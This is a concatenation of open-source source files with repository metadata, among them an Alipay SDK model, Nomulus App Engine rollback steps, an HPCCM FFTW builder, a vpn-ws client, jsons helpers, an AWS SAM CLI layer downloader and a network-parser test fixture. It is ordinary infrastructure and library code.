#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ArrangementBaseSelector import ArrangementBaseSelector
from alipay.aop.api.domain.ArrangementConditionGroupSelector import ArrangementConditionGroupSelector
from alipay.aop.api.domain.ArrangementInvolvedPartyQuerier import ArrangementInvolvedPartyQuerier
from alipay.aop.api.domain.ArrangementNoQuerier import ArrangementNoQuerier
class AntProdpaasArrangementCommonQueryModel(object):
def __init__(self):
self._arrangement_base_selector = None
self._arrangement_condition_group_selector = None
self._arrangement_involved_party_querier = None
self._arrangement_no_querier = None
@property
def arrangement_base_selector(self):
return self._arrangement_base_selector
@arrangement_base_selector.setter
def arrangement_base_selector(self, value):
if isinstance(value, ArrangementBaseSelector):
self._arrangement_base_selector = value
else:
self._arrangement_base_selector = ArrangementBaseSelector.from_alipay_dict(value)
@property
def arrangement_condition_group_selector(self):
return self._arrangement_condition_group_selector
@arrangement_condition_group_selector.setter
def arrangement_condition_group_selector(self, value):
if isinstance(value, ArrangementConditionGroupSelector):
self._arrangement_condition_group_selector = value
else:
self._arrangement_condition_group_selector = ArrangementConditionGroupSelector.from_alipay_dict(value)
@property
def arrangement_involved_party_querier(self):
return self._arrangement_involved_party_querier
@arrangement_involved_party_querier.setter
def arrangement_involved_party_querier(self, value):
if isinstance(value, ArrangementInvolvedPartyQuerier):
self._arrangement_involved_party_querier = value
else:
self._arrangement_involved_party_querier = ArrangementInvolvedPartyQuerier.from_alipay_dict(value)
@property
def arrangement_no_querier(self):
return self._arrangement_no_querier
@arrangement_no_querier.setter
def arrangement_no_querier(self, value):
if isinstance(value, ArrangementNoQuerier):
self._arrangement_no_querier = value
else:
self._arrangement_no_querier = ArrangementNoQuerier.from_alipay_dict(value)
def to_alipay_dict(self):
params = dict()
if self.arrangement_base_selector:
if hasattr(self.arrangement_base_selector, 'to_alipay_dict'):
params['arrangement_base_selector'] = self.arrangement_base_selector.to_alipay_dict()
else:
params['arrangement_base_selector'] = self.arrangement_base_selector
if self.arrangement_condition_group_selector:
if hasattr(self.arrangement_condition_group_selector, 'to_alipay_dict'):
params['arrangement_condition_group_selector'] = self.arrangement_condition_group_selector.to_alipay_dict()
else:
params['arrangement_condition_group_selector'] = self.arrangement_condition_group_selector
if self.arrangement_involved_party_querier:
if hasattr(self.arrangement_involved_party_querier, 'to_alipay_dict'):
params['arrangement_involved_party_querier'] = self.arrangement_involved_party_querier.to_alipay_dict()
else:
params['arrangement_involved_party_querier'] = self.arrangement_involved_party_querier
if self.arrangement_no_querier:
if hasattr(self.arrangement_no_querier, 'to_alipay_dict'):
params['arrangement_no_querier'] = self.arrangement_no_querier.to_alipay_dict()
else:
params['arrangement_no_querier'] = self.arrangement_no_querier
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AntProdpaasArrangementCommonQueryModel()
if 'arrangement_base_selector' in d:
o.arrangement_base_selector = d['arrangement_base_selector']
if 'arrangement_condition_group_selector' in d:
o.arrangement_condition_group_selector = d['arrangement_condition_group_selector']
if 'arrangement_involved_party_querier' in d:
o.arrangement_involved_party_querier = d['arrangement_involved_party_querier']
if 'arrangement_no_querier' in d:
o.arrangement_no_querier = d['arrangement_no_querier']
return o
|
58358e7250015934d7c168ad728d5a4b0dc1393a
|
adebaf6fa8518bb8119b4edd6e8dbb319f79e947
|
/release/rollback/steps.py
|
5068109f4656ac226b1db894583416614da7e484
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
google/nomulus
|
a482d1e15dd7e9f0faedea404c3137385a1633f7
|
7b59c4abbff56f37a0cf0bf0467e0f520b2056a5
|
refs/heads/master
| 2023-08-27T10:51:26.301885
| 2023-08-25T20:30:37
| 2023-08-25T20:30:37
| 52,821,506
| 1,785
| 324
|
Apache-2.0
| 2023-09-14T20:53:52
| 2016-02-29T20:16:48
|
Java
|
UTF-8
|
Python
| false
| false
| 6,997
|
py
|
steps.py
|
# Copyright 2020 The Nomulus Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition of rollback steps and factory methods to create them."""
import dataclasses
import subprocess
import textwrap
from typing import Tuple
import appengine
import common
@dataclasses.dataclass(frozen=True)
class RollbackStep:
"""One rollback step.
Most steps are implemented using commandline tools, e.g., gcloud and
gsutil, and execute their commands by forking a subprocess. Each step
also has a info method that returns its command with a description.
Two steps are handled differently. The _UpdateDeployTag step gets a piped
shell command, which needs to be handled differently. The
_SetManualScalingNumInstances step uses the AppEngine Admin API client in
this package to set the number of instances.
"""
description: str
command: Tuple[str, ...]
def info(self) -> str:
return f'# {self.description}\n' f'{" ".join(self.command)}'
def execute(self) -> None:
"""Executes the step.
Raises:
CannotRollbackError if command fails.
"""
if subprocess.call(self.command) != 0:
raise common.CannotRollbackError(f'Failed: {self.description}')
def check_schema_compatibility(dev_project: str, nom_tag: str,
sql_tag: str) -> RollbackStep:
return RollbackStep(description='Check compatibility with SQL schema.',
command=(f'{common.get_nomulus_root()}/nom_build',
':integration:sqlIntegrationTest',
f'--schema_version={sql_tag}',
f'--nomulus_version={nom_tag}',
'--publish_repo='
f'gcs://{dev_project}-deployed-tags/maven'))
@dataclasses.dataclass(frozen=True)
class _SetManualScalingNumInstances(RollbackStep):
"""Sets the number of instances for a manual scaling version.
The Nomulus set_num_instances command is currently broken. This step uses
the AppEngine REST API to update the version.
"""
appengine_admin: appengine.AppEngineAdmin
version: common.VersionKey
num_instance: int
def execute(self) -> None:
self.appengine_admin.set_manual_scaling_num_instance(
self.version.service_id, self.version.version_id,
self.num_instance)
def set_manual_scaling_instances(appengine_admin: appengine.AppEngineAdmin,
version: common.VersionConfig,
num_instances: int) -> RollbackStep:
cmd_description = textwrap.dedent("""\
Nomulus set_num_instances command is currently broken.
This script uses the AppEngine REST API to update the version.
To set this value without using this tool, you may use the REST API at
https://cloud.google.com/appengine/docs/admin-api/reference/rest/v1beta/apps.services.versions/patch
""")
return _SetManualScalingNumInstances(
f'Set number of instance for manual-scaling version '
f'{version.version_id} in {version.service_id} to {num_instances}.',
(cmd_description, ''), appengine_admin, version, num_instances)
def start_or_stop_version(project: str, action: str,
version: common.VersionKey) -> RollbackStep:
"""Creates a rollback step that starts or stops an AppEngine version.
Args:
project: The GCP project of the AppEngine application.
action: Start or Stop.
version: The version being managed.
"""
return RollbackStep(
f'{action.title()} {version.version_id} in {version.service_id}',
('gcloud', 'app', 'versions', action, version.version_id, '--quiet',
'--service', version.service_id, '--project', project))
def direct_service_traffic_to_version(
project: str, version: common.VersionKey) -> RollbackStep:
return RollbackStep(
f'Direct all traffic to {version.version_id} in {version.service_id}.',
('gcloud', 'app', 'services', 'set-traffic', version.service_id,
'--quiet', f'--splits={version.version_id}=1', '--project', project))
@dataclasses.dataclass(frozen=True)
class KillNomulusInstance(RollbackStep):
"""Step that kills a Nomulus VM instance."""
instance_name: str
# yapf: disable
def kill_nomulus_instance(project: str,
version: common.VersionKey,
instance_name: str) -> KillNomulusInstance:
# yapf: enable
return KillNomulusInstance(
'Delete one VM instance.',
('gcloud', 'app', 'instances', 'delete', instance_name, '--quiet',
'--user-output-enabled=false', '--service', version.service_id,
'--version', version.version_id, '--project', project), instance_name)
@dataclasses.dataclass(frozen=True)
class _UpdateDeployTag(RollbackStep):
"""Updates the deployment tag on GCS."""
nom_tag: str
destination: str
def execute(self) -> None:
with subprocess.Popen(('gsutil', 'cp', '-', self.destination),
stdin=subprocess.PIPE) as p:
try:
p.communicate(self.nom_tag.encode('utf-8'))
if p.wait() != 0:
raise common.CannotRollbackError(
f'Failed: {self.description}')
except:
p.kill()
raise
def update_deploy_tags(dev_project: str, env: str,
nom_tag: str) -> RollbackStep:
destination = f'gs://{dev_project}-deployed-tags/nomulus.{env}.tag'
return _UpdateDeployTag(
f'Update Nomulus tag in {env}',
(f'echo {nom_tag} | gsutil cp - {destination}', ''), nom_tag,
destination)
def sync_live_release(dev_project: str, nom_tag: str) -> RollbackStep:
"""Syncs the target release artifacts to the live folder.
By convention the gs://{dev_project}-deploy/live folder should contain the
artifacts from the currently serving release.
For Domain Registry team members, this step updates the nomulus tool
installed on corp desktops.
"""
artifacts_folder = f'gs://{dev_project}-deploy/{nom_tag}'
live_folder = f'gs://{dev_project}-deploy/live'
return RollbackStep(
f'Syncing {artifacts_folder} to {live_folder}.',
('gsutil', '-m', 'rsync', '-d', artifacts_folder, live_folder))
|
c89161ba84913cc6d8ab5d8e8a9b71aa1e613d1d
|
c140ad38b1463024e289ceb0d5d6d44a45c91724
|
/hpccm/building_blocks/fftw.py
|
8b733c206da6799165fb61d86a377e1f25886af1
|
[
"Apache-2.0"
] |
permissive
|
NVIDIA/hpc-container-maker
|
3a333526decbd18352ef8d1fb3bec0033be221e8
|
60fd2a51c171258a6b3f93c2523101cb7018ba1b
|
refs/heads/master
| 2023-08-21T13:32:27.132476
| 2023-06-12T21:12:40
| 2023-06-12T21:12:40
| 126,385,168
| 419
| 88
|
Apache-2.0
| 2023-09-11T18:33:26
| 2018-03-22T19:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 7,929
|
py
|
fftw.py
|
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=invalid-name, too-few-public-methods
# pylint: disable=too-many-instance-attributes
"""FFTW building block"""
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import posixpath
import hpccm.config
import hpccm.templates.envvars
import hpccm.templates.ldconfig
from hpccm.building_blocks.base import bb_base
from hpccm.building_blocks.generic_autotools import generic_autotools
from hpccm.building_blocks.packages import packages
from hpccm.common import cpu_arch
from hpccm.primitives.comment import comment
class fftw(bb_base, hpccm.templates.envvars, hpccm.templates.ldconfig):
"""The `fftw` building block downloads, configures, builds, and
installs the [FFTW](http://www.fftw.org) component. Depending on
the parameters, the source will be downloaded from the web
(default) or copied from a source directory in the local build
context.
# Parameters
annotate: Boolean flag to specify whether to include annotations
(labels). The default is False.
check: Boolean flag to specify whether the `make check` step
should be performed. The default is False.
configure_opts: List of options to pass to `configure`. For
x86_64 processors, the default values are `--enable-shared`,
`--enable-openmp`, `--enable-threads`, and `--enable-sse2`. For
other processors, the default values are `--enable-shared`,
`--enable-openmp`, and `--enable-threads`.
directory: Path to the unpackaged source directory relative to the
local build context. The default value is empty. If this is
defined, the source in the local build context will be used rather
than downloading the source from the web.
disable_FEATURE: Flags to control disabling features when
configuring. For instance, `disable_foo=True` maps to
`--disable-foo`. Underscores in the parameter name are converted
to dashes.
enable_FEATURE[=ARG]: Flags to control enabling features when
configuring. For instance, `enable_foo=True` maps to
`--enable-foo` and `enable_foo='yes'` maps to `--enable-foo=yes`.
Underscores in the parameter name are converted to dashes.
environment: Boolean flag to specify whether the environment
(`LD_LIBRARY_PATH`) should be modified to include FFTW. The
default is True.
ldconfig: Boolean flag to specify whether the FFTW library
directory should be added dynamic linker cache. If False, then
`LD_LIBRARY_PATH` is modified to include the FFTW library
directory. The default value is False.
mpi: Boolean flag to specify whether to build with MPI support
enabled. The default is False.
ospackages: List of OS packages to install prior to configuring
and building. The default values are `file`, `make`, and `wget`.
prefix: The top level install location. The default value is
`/usr/local/fftw`.
toolchain: The toolchain object. This should be used if
non-default compilers or other toolchain options are needed. The
default is empty.
version: The version of FFTW source to download. This value is
ignored if `directory` is set. The default value is `3.3.10`.
with_PACKAGE[=ARG]: Flags to control optional packages when
configuring. For instance, `with_foo=True` maps to `--with-foo`
and `with_foo='/usr/local/foo'` maps to
`--with-foo=/usr/local/foo`. Underscores in the parameter name
are converted to dashes.
without_PACKAGE: Flags to control optional packages when
configuring. For instance `without_foo=True` maps to
`--without-foo`. Underscores in the parameter name are converted
to dashes.
# Examples
```python
fftw(prefix='/opt/fftw/3.3.7', version='3.3.7')
```
```python
fftw(directory='sources/fftw-3.3.7')
```
```python
n = nvhpc(eula=True)
fftw(toolchain=n.toolchain)
```
```python
fftw(check=True, configure_opts=['--enable-shared', '--enable-threads',
'--enable-sse2', '--enable-avx'])
```
"""
def __init__(self, **kwargs):
"""Initialize building block"""
super(fftw, self).__init__(**kwargs)
self.__baseurl = kwargs.pop('baseurl', 'ftp://ftp.fftw.org/pub/fftw')
self.__check = kwargs.pop('check', False)
self.__configure_opts = kwargs.pop('configure_opts', [])
self.__directory = kwargs.pop('directory', '')
self.__mpi = kwargs.pop('mpi', False)
self.__ospackages = kwargs.pop('ospackages', ['file', 'make', 'wget'])
self.__prefix = kwargs.pop('prefix', '/usr/local/fftw')
self.__version = kwargs.pop('version', '3.3.10')
# Set the configure options
self.__configure()
# Set the environment variables
if not self.ldconfig:
self.environment_variables['LD_LIBRARY_PATH'] = '{}:$LD_LIBRARY_PATH'.format(posixpath.join(self.__prefix, 'lib'))
# Setup build configuration
self.__bb = generic_autotools(
annotations={'version': self.__version},
base_annotation=self.__class__.__name__,
check=self.__check,
configure_opts=self.__configure_opts,
comment=False,
devel_environment=self.environment_variables,
# PGI compiler needs a larger stack size
postconfigure=['ulimit -s unlimited'] if self.__check else None,
prefix=self.__prefix,
runtime_environment=self.environment_variables,
url='{0}/fftw-{1}.tar.gz'.format(self.__baseurl, self.__version),
**kwargs)
# Container instructions
self += comment('FFTW version {}'.format(self.__version))
self += packages(ospackages=self.__ospackages)
self += self.__bb
def __configure(self):
"""Setup configure options based on user parameters and CPU
architecture"""
if hpccm.config.g_cpu_arch == cpu_arch.X86_64:
if not self.__configure_opts:
self.__configure_opts = ['--enable-shared', '--enable-openmp',
'--enable-threads', '--enable-sse2']
if hpccm.config.test_cpu_feature_flag('avx'):
self.__configure_opts.append('--enable-avx')
if hpccm.config.test_cpu_feature_flag('avx2'):
self.__configure_opts.append('--enable-avx2')
if hpccm.config.test_cpu_feature_flag('avx512'):
self.__configure_opts.append('--enable-avx512')
else:
if not self.__configure_opts:
self.__configure_opts = ['--enable-shared', '--enable-openmp',
'--enable-threads']
if self.__mpi:
self.__configure_opts.append('--enable-mpi')
def runtime(self, _from='0'):
"""Generate the set of instructions to install the runtime specific
components from a build in a previous stage.
# Examples
```python
f = fftw(...)
Stage0 += f
Stage1 += f.runtime()
```
"""
self.rt += comment('FFTW')
self.rt += self.__bb.runtime(_from=_from)
return str(self.rt)
|
610b2a203911684ccee85589f44753fdc6f1190f
|
2150466ca493d7659d8e65ca4498a4e4e88c0854
|
/clients/vpn_linux_tornado.py
|
5d003e65d410674eef9af32a6a89e41d80635961
|
[
"MIT"
] |
permissive
|
unbit/vpn-ws
|
43ce0287d869611a1a6ab354f38ad59aeab456b2
|
f57aaf73164de3abd85955e74ff41a962d9fe185
|
refs/heads/master
| 2023-06-08T06:22:40.245353
| 2023-04-03T04:36:17
| 2023-04-03T04:36:17
| 26,267,188
| 494
| 120
|
MIT
| 2023-04-03T04:36:18
| 2014-11-06T11:32:35
|
C
|
UTF-8
|
Python
| false
| false
| 617
|
py
|
vpn_linux_tornado.py
|
from tornado import ioloop
from ws4py.client.tornadoclient import TornadoWebSocketClient
from pytun import TunTapDevice, IFF_TAP, IFF_NO_PI
import sys
io_loop = ioloop.IOLoop.instance()
tap = TunTapDevice(flags=IFF_TAP|IFF_NO_PI, name='vpn-ws%d')
class VpnWSClient(TornadoWebSocketClient):
def received_message(self, m):
tap.write(str(m))
def closed(self, code, reason=None):
print "ooops"
ws = VpnWSClient(sys.argv[1])
ws.connect()
def tap_callback(fd, event):
ws.send(tap.read(tap.mtu), binary=True)
io_loop.add_handler(tap.fileno(), tap_callback, io_loop.READ)
io_loop.start()
|
e8a72528f56e1f8d2ab2dbe115a49632f5687349
|
474c281c47aed69036b2a13e9a60d150d8ecddc5
|
/jsons/_dump_impl.py
|
c37165774d49b83a8e17676682d636d5909cf13c
|
[
"MIT"
] |
permissive
|
ramonhagenaars/jsons
|
c2445eb7c002544abdfde4ac63d42f5a93e4d776
|
9abbf3a3bd32435ac74bc98c3554ad3c71086036
|
refs/heads/master
| 2023-07-23T22:08:10.093119
| 2022-06-09T19:50:52
| 2022-06-09T19:50:52
| 140,337,655
| 286
| 52
|
MIT
| 2023-07-14T15:20:59
| 2018-07-09T20:18:08
|
Python
|
UTF-8
|
Python
| false
| false
| 3,997
|
py
|
_dump_impl.py
|
"""
PRIVATE MODULE: do not import (from) it directly.
This module contains functionality for dumping stuff to json.
"""
import json
from typing import Optional, Dict
from jsons._cache import clear
from jsons._common_impl import StateHolder
from jsons._extra_impl import announce_class
from jsons._lizers_impl import get_serializer
from jsons.exceptions import SerializationError
def dump(obj: object,
cls: Optional[type] = None,
*,
strict: bool = False,
fork_inst: Optional[type] = StateHolder,
**kwargs) -> object:
"""
Serialize the given ``obj`` to a JSON equivalent type (e.g. dict, list,
int, ...).
The way objects are serialized can be finetuned by setting serializer
functions for the specific type using ``set_serializer``.
You can also provide ``cls`` to specify that ``obj`` needs to be serialized
as if it was of type ``cls`` (meaning to only take into account attributes
from ``cls``). The type ``cls`` must have a ``__slots__`` defined. Any type
will do, but in most cases you may want ``cls`` to be a base class of
``obj``.
:param obj: a Python instance of any sort.
:param cls: if given, ``obj`` will be dumped as if it is of type ``type``.
:param strict: a bool to determine if the serializer should be strict
(i.e. only dumping stuff that is known to ``cls``).
:param fork_inst: if given, it uses this fork of ``JsonSerializable``.
:param kwargs: the keyword args are passed on to the serializer function.
:return: the serialized obj as a JSON type.
"""
cls_ = cls or obj.__class__
serializer = get_serializer(cls_, fork_inst)
# Is this the initial call or a nested?
initial = kwargs.get('_initial', True)
kwargs_ = {
'fork_inst': fork_inst,
'_initial': False,
'strict': strict,
**kwargs
}
announce_class(cls_, fork_inst=fork_inst)
return _do_dump(obj, serializer, cls, initial, kwargs_)
def _do_dump(obj, serializer, cls, initial, kwargs):
try:
result = serializer(obj, cls=cls, **kwargs)
if initial:
clear()
return result
except Exception as err:
clear()
raise SerializationError(str(err)) from err
def dumps(obj: object,
jdkwargs: Optional[Dict[str, object]] = None,
*args,
**kwargs) -> str:
"""
Extend ``json.dumps``, allowing any Python instance to be dumped to a
string. Any extra (keyword) arguments are passed on to ``json.dumps``.
:param obj: the object that is to be dumped to a string.
:param jdkwargs: extra keyword arguments for ``json.dumps`` (not
``jsons.dumps``!)
:param args: extra arguments for ``jsons.dumps``.
:param kwargs: Keyword arguments that are passed on through the
serialization process.
passed on to the serializer function.
:return: ``obj`` as a ``str``.
"""
jdkwargs = jdkwargs or {}
dumped = dump(obj, *args, **kwargs)
return json.dumps(dumped, **jdkwargs)
def dumpb(obj: object,
encoding: str = 'utf-8',
jdkwargs: Optional[Dict[str, object]] = None,
*args,
**kwargs) -> bytes:
"""
Extend ``json.dumps``, allowing any Python instance to be dumped to bytes.
Any extra (keyword) arguments are passed on to ``json.dumps``.
:param obj: the object that is to be dumped to bytes.
:param encoding: the encoding that is used to transform to bytes.
:param jdkwargs: extra keyword arguments for ``json.dumps`` (not
``jsons.dumps``!)
:param args: extra arguments for ``jsons.dumps``.
:param kwargs: Keyword arguments that are passed on through the
serialization process.
passed on to the serializer function.
:return: ``obj`` as ``bytes``.
"""
jdkwargs = jdkwargs or {}
dumped_dict = dump(obj, *args, **kwargs)
dumped_str = json.dumps(dumped_dict, **jdkwargs)
return dumped_str.encode(encoding=encoding)
|
d79f7f770e2968fa9fe0f430cb47f6bd7884e654
|
d88458a65a173999df390117005fa813735e5fe2
|
/astroquery/utils/tap/model/shared_to_item.py
|
f30876b280dc385c760710e6cafd4b08bcc95c84
|
[] |
permissive
|
astropy/astroquery
|
9a2793826229ba4b41ec3607ca77832036a534e9
|
51316d7417d7daf01a8b29d1df99037b9227c2bc
|
refs/heads/main
| 2023-09-01T20:52:41.625935
| 2023-08-29T23:22:40
| 2023-08-29T23:22:40
| 4,787,269
| 636
| 365
|
BSD-3-Clause
| 2023-09-14T21:56:33
| 2012-06-25T20:52:07
|
Python
|
UTF-8
|
Python
| false
| false
| 719
|
py
|
shared_to_item.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
=============
TAP plus
=============
@author: Javier Durtan
@contact: javier.duran@sciops.esa.int
European Space Astronomy Centre (ESAC)
European Space Agency (ESA)
Created on 28 sep. 2018
"""
class TapSharedToItem:
"""TAP shared to item object
"""
def __init__(self, attrs):
"""Constructor
"""
self.__attributes = attrs
self.id = attrs.getValue("shareTo")
self.type = attrs.getValue("shareType")
self.mode = attrs.getValue("shareMode")
def __str__(self):
return f"Shared to item: {self.id}" \
f"\n\tType: {self.type}" \
f"\n\tMode: {self.mode}"
|
0eae673c108a4a13f7ab3cb5284d86d9698337bb
|
e2d31e3754624eeb0a2dace8691c5c25ed3b988e
|
/generate_gmake2_vulkan.py
|
f6a3fbfabead915e0bbf9465aeb49a2594bde651
|
[
"MIT"
] |
permissive
|
PanosK92/SpartanEngine
|
da7950d3e5a673b3fd7881c6e9370d84c8e361a1
|
9cf38d84c344dad43a2cb45f018914f7504f1047
|
refs/heads/master
| 2023-09-01T09:01:47.784814
| 2023-08-24T09:42:53
| 2023-08-24T09:42:53
| 61,415,047
| 1,655
| 169
|
MIT
| 2023-09-11T15:08:52
| 2016-06-18T03:27:49
|
C++
|
UTF-8
|
Python
| false
| false
| 262
|
py
|
generate_gmake2_vulkan.py
|
import os
import subprocess
import sys
# change working directory to script directory
os.chdir(os.path.dirname(__file__))
# run script
subprocess.Popen("python3 build_scripts/generate_project_files.py gmake2 vulkan", shell=True).communicate()
# exit
sys.exit(0)
|
1151146929c813d7d0881b19e41a92ebd008353b
|
10cb11f83e1c8b51b9d72c28d6259a56ff1a97c8
|
/samcli/local/layers/layer_downloader.py
|
a600a032fe10aa524f0464b256298f39c35c96c3
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"BSD-2-Clause"
] |
permissive
|
aws/aws-sam-cli
|
6d4411aacf7f861e75e5cf4882a32858797a276d
|
b297ff015f2b69d7c74059c2d42ece1c29ea73ee
|
refs/heads/develop
| 2023-08-30T23:28:36.179932
| 2023-08-30T21:58:26
| 2023-08-30T21:58:26
| 92,205,085
| 1,402
| 470
|
Apache-2.0
| 2023-09-14T21:14:23
| 2017-05-23T18:16:23
|
Python
|
UTF-8
|
Python
| false
| false
| 5,967
|
py
|
layer_downloader.py
|
"""
Downloads Layers locally
"""
import logging
from pathlib import Path
from typing import List
import boto3
from botocore.exceptions import ClientError, NoCredentialsError
from samcli.commands.local.cli_common.user_exceptions import CredentialsRequired, ResourceNotFound
from samcli.lib.providers.provider import LayerVersion, Stack
from samcli.lib.utils.codeuri import resolve_code_path
from samcli.local.lambdafn.remote_files import unzip_from_uri
LOG = logging.getLogger(__name__)
class LayerDownloader:
def __init__(self, layer_cache, cwd, stacks: List[Stack], lambda_client=None):
"""
Parameters
----------
layer_cache str
path where to cache layers
cwd str
Current working directory
stacks List[Stack]
List of all stacks
lambda_client boto3.client('lambda')
Boto3 Client for AWS Lambda
"""
self._layer_cache = layer_cache
self.cwd = cwd
self._stacks = stacks
self._lambda_client = lambda_client
@property
def lambda_client(self):
self._lambda_client = self._lambda_client or boto3.client("lambda")
return self._lambda_client
@property
def layer_cache(self):
"""
Layer Cache property. This will always return a cache that exists on the system.
Returns
-------
str
Path to the Layer Cache
"""
self._create_cache(self._layer_cache)
return self._layer_cache
def download_all(self, layers, force=False):
"""
Download a list of layers to the cache
Parameters
----------
layers list(samcli.commands.local.lib.provider.Layer)
List of Layers representing the layer to be downloaded
force bool
True to download the layer even if it exists already on the system
Returns
-------
List(Path)
List of Paths to where the layer was cached
"""
layer_dirs = []
for layer in layers:
layer_dirs.append(self.download(layer, force))
return layer_dirs
def download(self, layer: LayerVersion, force=False) -> LayerVersion:
"""
Download a given layer to the local cache.
Parameters
----------
layer samcli.commands.local.lib.provider.Layer
Layer representing the layer to be downloaded.
force bool
True to download the layer even if it exists already on the system
Returns
-------
Path
Path object that represents where the layer is download to
"""
if layer.is_defined_within_template:
LOG.info("%s is a local Layer in the template", layer.name)
layer.codeuri = resolve_code_path(self.cwd, layer.codeuri)
return layer
layer_path = Path(self.layer_cache).resolve().joinpath(layer.name)
is_layer_downloaded = self._is_layer_cached(layer_path)
layer.codeuri = str(layer_path)
if is_layer_downloaded and not force:
LOG.info("%s is already cached. Skipping download", layer.arn)
return layer
layer_zip_path = layer.codeuri + ".zip"
layer_zip_uri = self._fetch_layer_uri(layer)
unzip_from_uri(
layer_zip_uri,
layer_zip_path,
unzip_output_dir=layer.codeuri,
progressbar_label="Downloading {}".format(layer.layer_arn),
)
return layer
def _fetch_layer_uri(self, layer):
"""
Fetch the Layer Uri based on the LayerVersion Arn
Parameters
----------
layer samcli.commands.local.lib.provider.LayerVersion
LayerVersion to fetch
Returns
-------
str
The Uri to download the LayerVersion Content from
Raises
------
samcli.commands.local.cli_common.user_exceptions.NoCredentialsError
When the Credentials given are not sufficient to call AWS Lambda
"""
try:
layer_version_response = self.lambda_client.get_layer_version(
LayerName=layer.layer_arn, VersionNumber=layer.version
)
except NoCredentialsError as ex:
raise CredentialsRequired("Layers require credentials to download the layers locally.") from ex
except ClientError as e:
error_code = e.response.get("Error").get("Code")
error_exc = {
"AccessDeniedException": CredentialsRequired(
"Credentials provided are missing lambda:Getlayerversion policy that is needed to download the "
"layer or you do not have permission to download the layer"
),
"ResourceNotFoundException": ResourceNotFound("{} was not found.".format(layer.arn)),
}
if error_code in error_exc:
raise error_exc[error_code]
# If it was not 'AccessDeniedException' or 'ResourceNotFoundException' re-raise
raise e
return layer_version_response.get("Content").get("Location")
@staticmethod
def _is_layer_cached(layer_path: Path) -> bool:
"""
Checks if the layer is already cached on the system
Parameters
----------
layer_path Path
Path to where the layer should exist if cached on the system
Returns
-------
bool
True if the layer_path already exists otherwise False
"""
return layer_path.exists()
@staticmethod
def _create_cache(layer_cache):
"""
Create the Cache directory if it does not exist.
Parameters
----------
layer_cache
Directory to where the layers should be cached
"""
Path(layer_cache).mkdir(mode=0o700, parents=True, exist_ok=True)
|
556c7237e6bd357fdaaa314c0d80b7c1616125da
|
5ef6c8d47864f471e26b9902d61f8c687e941f05
|
/src/genie/libs/parser/iosxe/tests/ShowInterfaces/cli/equal/golden_output_2_expected.py
|
e7883907e661cfd76e8ee83a1c45a910567f3017
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genieparser
|
169c196558f1c1a0f0d10650876096f993224917
|
b531eff760b2e44cd69d7a2716db6f866907c239
|
refs/heads/master
| 2023-09-03T08:56:18.831340
| 2023-08-29T22:32:02
| 2023-08-29T22:32:02
| 131,621,824
| 247
| 409
|
Apache-2.0
| 2023-08-29T22:32:04
| 2018-04-30T16:51:50
|
Python
|
UTF-8
|
Python
| false
| false
| 10,343
|
py
|
golden_output_2_expected.py
|
expected_output = {
"TenGigabitEthernet0/1/0": {
"arp_timeout": "04:00:00",
"arp_type": "arpa",
"auto_negotiate": False,
"bandwidth": 10000000,
"counters": {
"in_broadcast_pkts": 7,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 5592817,
"in_no_buffer": 0,
"in_octets": 146338033143374,
"in_overrun": 0,
"in_pkts": 173550579294,
"in_runts": 0,
"in_throttles": 0,
"in_watchdog": 0,
"last_clear": "never",
"out_babble": 0,
"out_buffer_failure": 0,
"out_buffers_swapped": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_interface_resets": 2,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_no_carrier": 0,
"out_octets": 16525140785118,
"out_pkts": 39328190625,
"out_underruns": 0,
"out_unknown_protocl_drops": 0,
"rate": {
"in_rate": 49998000,
"in_rate_pkts": 6546,
"load_interval": 300,
"out_rate": 8598000,
"out_rate_pkts": 1638,
},
},
"delay": 10,
"duplex_mode": "full",
"enabled": True,
"is_deleted": False,
"encapsulations": {"encapsulation": "arpa"},
"flow_control": {"receive": True, "send": True},
"ipv4": {"10.209.98.103/31": {"ip": "10.209.98.103", "prefix_length": "31"}},
"last_input": "02:29:25",
"last_output": "02:29:25",
"line_protocol": "up",
"link_type": "force-up",
"mac_address": "2c33.11ff.fa19",
"media_type": "SFP-LR",
"mtu": 4000,
"oper_status": "up",
"output_hang": "never",
"phys_address": "2c33.11ff.fa19",
"port_channel": {"port_channel_member": False},
"port_speed": "10000mbps",
"queues": {
"input_queue_drops": 0,
"input_queue_flushes": 0,
"input_queue_max": 375,
"input_queue_size": 0,
"output_queue_max": 40,
"output_queue_size": 0,
"queue_strategy": "fifo",
"total_output_drop": 0,
},
"reliability": "255/255",
"rxload": "1/255",
"txload": "1/255",
"type": "BUILT-IN-EPA-8x10G",
},
"TenGigabitEthernet0/1/1": {
"arp_timeout": "04:00:00",
"arp_type": "arpa",
"auto_negotiate": False,
"bandwidth": 10000000,
"counters": {
"in_broadcast_pkts": 98185589,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 96415788,
